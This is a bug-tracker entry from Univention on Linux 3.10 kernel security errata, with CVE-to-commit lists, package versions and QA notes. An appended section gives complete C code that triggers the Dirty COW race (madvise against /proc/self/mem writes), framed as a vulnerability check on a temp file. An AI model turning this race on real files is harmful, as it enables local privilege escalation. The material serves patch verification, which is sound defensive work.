Univention Bugzilla – Bug 41314
linux: Multiple security issues (3.2)
Last modified: 2016-10-26 17:34:36 CEST
Upstream v3.10.101 fixes several issues with respect to v3.10.96 (Bug #39209): CVE-2015-7566 CVE-2015-7990 CVE-2015-8785 CVE-2015-8812 CVE-2016-0723 CVE-2016-2384 CVE-2016-2550 CVE-2016-2782 CVE-2016-partial-SMAP-bypass I identified these from the git commit IDs.
Upstream v3.10.102 fixes several issues with respect to v3.10.101:
CVE-2016-4580: 79e48650320e6fba48369fccf13fd045315b19b8
CVE-2016-4486: 5f8e44741f9f216e33736ea4ec65ca9ac03036e6
CVE-2016-4485: b8670c09f37bdf2847cc44f36511a53afc6161fd
CVE-2016-2117: f43bfaeddc79effbf3d0fcb53ca477cca66f3db8
CVE-2016-4913: 99d825822eade8d827a1817357cbf3f889a552d6
CVE-2016-0821: 8a5e5e02fc83aaf67053ab53b359af08c6c49aaf
CVE-2016-3955: b348d7dddb6c4fbfc810b7a0626e8ec9e29f7cbb
CVE-2016-2187: 162f98dea487206d9ab79fc12ed64700667a894d
CVE-2015-7833: fa52bd506f274b7619955917abfde355e3d19ffe
CVE-2016-4805: 1f461dcdd296eecedaffffc6bae2bfa90bd7eb89
CVE-2016-3951: 1666984c8625b3db19a9abc298931d35ab7bc64b
CVE-2016-2185: 950336ba3e4a1ffd2ca60d29f6ef386dd2c7351d
CVE-2016-3689: a0ad220c96692eda76b2e3fd7279f3dcd1d8a8ff
CVE-2016-2186: 9c6ba456711687b794dcf285856fc14e2c76074f
CVE-2016-3137: c55aee1bf0e6b6feec8b2927b43f7a09a6d5f754
CVE-2016-3140: 5a07975ad0a36708c6b0a5b9fea1ff811d0b0c1f
CVE-2016-3136: 4e9a0b05257f29cf4b75f3209243ed71614d062e
CVE-2016-2188: 4ec0ef3a82125efc36173062a50624550a900ae0
CVE-2016-3138: 8835ba4a39cf53f705417b3b3a94eb067673f2c9
CVE-2016-3157: b7a584598aea7ca73140cb87b40319944dd3393f
I identified these from the git commit IDs above.
I guess we should also pick up the forthcoming yet unreleased tcp-make-challenge-acks-less-predictable.patch from https://anonscm.debian.org/cgit/kernel/linux.git/commit/?h=wheezy-security&id=f383788fb866fc61daf26836bccd92ebf7a6f02f (the patch applies cleanly). While it may not be that critical, and there is a workaround via sysctl.conf, it enjoys a certain publicity currently and customers will inquire.
New issues, currently only fixed in Debian sid (currently at Kernel 4.7):
* Race condition in the audit_log_single_execve_arg function in kernel/auditsc.c in the Linux kernel through 4.7 allows local users to bypass intended character-set restrictions or disrupt system-call auditing by changing a certain string, aka a "double fetch" vulnerability. (CVE-2016-6136)
* Race condition in the ioctl_send_fib function in drivers/scsi/aacraid/commctrl.c in the Linux kernel through 4.7 allows local users to cause a denial of service (out-of-bounds access or system crash) by changing a certain size value, aka a "double fetch" vulnerability. (CVE-2016-6480)
* Linux tcp_xmit_retransmit_queue use after free (CVE-2016-6828)
CVE-2016-6136: 43761473c254b45883a64441dd0bc85a42f3645c
CVE-2016-6480: fa00c437eef8dc2e7b25f8cd868cfa405fcc2bb3
CVE-2016-6828: bb1fceca22492109be12640d49f5ea5a544c6bb4
bd131fb1aa5e4cd879f89aef30f4f7cde6d4b409 audit: Kill the unused struct audit_aux_data_capset
9462dc59817580419ef1f2504e32f861c290f251 audit: remove unused envc member of audit_aux_data_execve
d9cfea91e97d5d19f9d69beaa844f5fe56a6adc6 audit: move audit_aux_data_execve contents into audit_context union
9410d228a4cf434305306746bb799fb7acdd8648 audit: call audit_bprm() only once to add AUDIT_EXECVE information
b7550787fe8b5beffb5f56fa11a87712d699d085 audit: remove stray newline from audit_log_execve_info() audit_panic() call
a49b282f08d96cd73838e4e1a5ace747d432ba7d audit: Fix check of return value of strnlen_user()
a4664afa0dffd5340c61511d3da14e30bfd01517 Fix broken audit tests for exec arg len
634a3fc5f16470e9b78ccd7ce643305122d5ebb2 audit: fix a double fetch in audit_log_single_execve_arg()
r16767
r16768
Package: linux
Version: 3.10.103-1.203.201610051715
Branch: ucs_3.2-0
Scope: errata3.2-8
r72952 | Bug #41314: Copyright 2016
r72951 | Bug #41314: Update to linux-3.10.103
Package: univention-kernel-image
Version: 7.0.0-24.107.201610060920
Branch: ucs_3.2-0
Scope: errata3.2-8
r72960 | Bug #41314: linux-3.10.103
YAML
linux.yaml
univention-kernel-image.yaml
QA: uname -r # 3.10.0-ucs203-686-pae
QA: uname -r # 3.10.0-ucs203-amd64
QA: diff dmesg
QA: zless /usr/share/doc/linux-image-3.10.0-ucs203-686-pae/changelog.Debian.gz
There are a couple of new issues reported for the Linux Kernel:
* The rfcomm_sock_bind function in net/bluetooth/rfcomm/sock.c in the Linux kernel before 4.2 allows local users to obtain sensitive information or cause a denial of service (NULL pointer dereference) via vectors involving a bind system call on a Bluetooth RFCOMM socket. (CVE-2015-8956)
* privilege escalation via MAP_PRIVATE COW breakage (CVE-2016-5195)
* The proc_keys_show function in security/keys/proc.c in the Linux kernel through 4.8.2, when the GNU Compiler Collection (gcc) stack protector is enabled, uses an incorrect buffer size for certain timeout data, which allows local users to cause a denial of service (stack memory corruption and panic) by reading the /proc/keys file. (CVE-2016-7042)
* The arcmsr_iop_message_xfer function in drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel through 4.8.2 does not restrict a certain length field, which allows local users to gain privileges or cause a denial of service (heap-based buffer overflow) via an ARCMSR_MESSAGE_WRITE_WQBUFFER control code. (CVE-2016-7425)
Of those, upstream v3.10.104 fixes only http://dirtycow.ninja/ (CVE-2016-5195):
mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream
We should pick that up with this erratum.
Package: linux
Version: 3.10.104-0.1.208.201610250906
Version: 3.10.104-0.1.209.201610250949
Version: 3.10.104-0.1.210.201610251001
Branch: ucs_3.2-0
Scope: errata3.2-8
Package: univention-kernel-image
Version: 7.0.0-25.114.201610251616
Branch: ucs_3.2-0
Scope: errata3.2-8
r73581 | Bug #41314: Update to 3.10.104
YAML
Verified:
* Upstream sources have been imported and UCS patches refreshed
* Imported sources match upstream v3.10.104 tag including the patch for CVE-2016-5195
* Existing Univention source patches have been merged into the new Debian source package
* New security patches merged into source package match upstream code
* The source version now contains "-0.1" instead of "-1", but that's ok: 3.10.104-0.1.210.201610251001
* Package update and reboot Ok
* PoC exploit rendered ineffective
* Advisory Ok
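The QA item "PoC exploit rendered ineffective" refers to CVE-2016-5195. The program below is an added, self-contained check written for this page; it is neither Univention's QA script nor the PoC from dirtycow.ninja. It creates a temporary file, maps it PROT_READ/MAP_PRIVATE, and races madvise(MADV_DONTNEED) against writes through /proc/self/mem (which uses FOLL_FORCE); on a kernel without commit 19be0eaffa3a the race can redirect the write to the page-cache page and the file on disk changes, on a fixed kernel every write lands in a private copy. The temp path template, the iteration count and the marker strings are assumptions; a result of -1 means the check could not be set up (for example no /proc or no writable /tmp), not that the kernel is safe.

```c
/* Added example: self-contained check for CVE-2016-5195 ("Dirty COW").
 * Not Univention's QA script and not the dirtycow.ninja PoC. Temp path,
 * ITERATIONS and the marker strings are assumptions.
 * Build: gcc -O2 -pthread dirtycow_check.c -o dirtycow_check */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ITERATIONS 100000   /* assumed; the public PoC loops far longer */

static const char original[] = "ucs-kernel-qa: this text must survive";
static const char payload[]  = "DIRTYCOW";   /* marker the race tries to plant */

struct race {
    void *map;                 /* private, read-only mapping of the file */
    size_t len;
    volatile int stop;         /* set by the writer when it is finished */
    volatile int proc_failed;  /* /proc/self/mem could not be opened */
};

/* Keeps discarding the private COW copy of the page so the next forced write
 * has to fault again; that re-fault is the window the bug lived in. */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    while (!r->stop)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Writes into the read-only mapping via /proc/self/mem (FOLL_FORCE). A fixed
 * kernel always lands the write in a fresh private copy; a vulnerable kernel can
 * be raced into writing the page-cache page that backs the file. */
static void *write_thread(void *arg)
{
    struct race *r = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) {
        r->proc_failed = 1;
    } else {
        for (int i = 0; i < ITERATIONS; i++) {
            ssize_t w = pwrite(fd, payload, sizeof payload - 1, (off_t)(uintptr_t)r->map);
            (void)w;
        }
        close(fd);
    }
    r->stop = 1;
    return NULL;
}

/* Returns 1 if the backing file was modified (kernel vulnerable), 0 if it was
 * not, -1 if the check could not be set up (no /proc, no temp dir, ...). */
int dirty_cow_check(void)
{
    char path[] = "/tmp/dirtycow-check-XXXXXX";   /* assumed location */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, original, sizeof original - 1) != (ssize_t)(sizeof original - 1)) {
        close(fd); unlink(path); return -1;
    }
    fchmod(fd, 0400);   /* read-only, like the root-owned target in the PoC */
    close(fd);

    fd = open(path, O_RDONLY);
    if (fd < 0) { unlink(path); return -1; }
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size <= 0) { close(fd); unlink(path); return -1; }

    struct race r = { .len = (size_t)st.st_size, .stop = 0, .proc_failed = 0 };
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (r.map == MAP_FAILED) { close(fd); unlink(path); return -1; }

    pthread_t t1, t2;
    if (pthread_create(&t1, NULL, madvise_thread, &r) != 0) {
        munmap(r.map, r.len); close(fd); unlink(path); return -1;
    }
    if (pthread_create(&t2, NULL, write_thread, &r) != 0) {
        r.stop = 1; pthread_join(t1, NULL);
        munmap(r.map, r.len); close(fd); unlink(path); return -1;
    }
    pthread_join(t2, NULL);   /* writer sets stop, which ends the madvise loop */
    pthread_join(t1, NULL);

    munmap(r.map, r.len);
    close(fd);

    /* Re-read through a fresh descriptor: a MAP_PRIVATE write must never reach the file. */
    char buf[sizeof original] = {0};
    fd = open(path, O_RDONLY);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof original - 1);
    if (fd >= 0)
        close(fd);
    unlink(path);

    if (r.proc_failed || n < 0)
        return -1;
    return memcmp(buf, original, sizeof original - 1) == 0 ? 0 : 1;
}

int main(void)
{
    int res = dirty_cow_check();
    if (res == 1)
        puts("VULNERABLE: file modified through a MAP_PRIVATE mapping (CVE-2016-5195)");
    else if (res == 0)
        puts("not vulnerable: file unchanged");
    else
        puts("inconclusive: check could not be set up");
    return res == 1 ? 2 : 0;
}
```

Run it as an unprivileged user before and after booting the 3.10.104 kernel: the pre-update kernel is expected to print the VULNERABLE line, the updated one the unchanged line. The check uses the process's own file and mapping rather than a root-owned one because the defect is in the COW handling of private mappings, not in file permissions; that is enough to tell a fixed kernel from a vulnerable one without touching anything outside /tmp.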
<http://errata.software-univention.de/ucs/3.2/450.html> <http://errata.software-univention.de/ucs/3.2/451.html>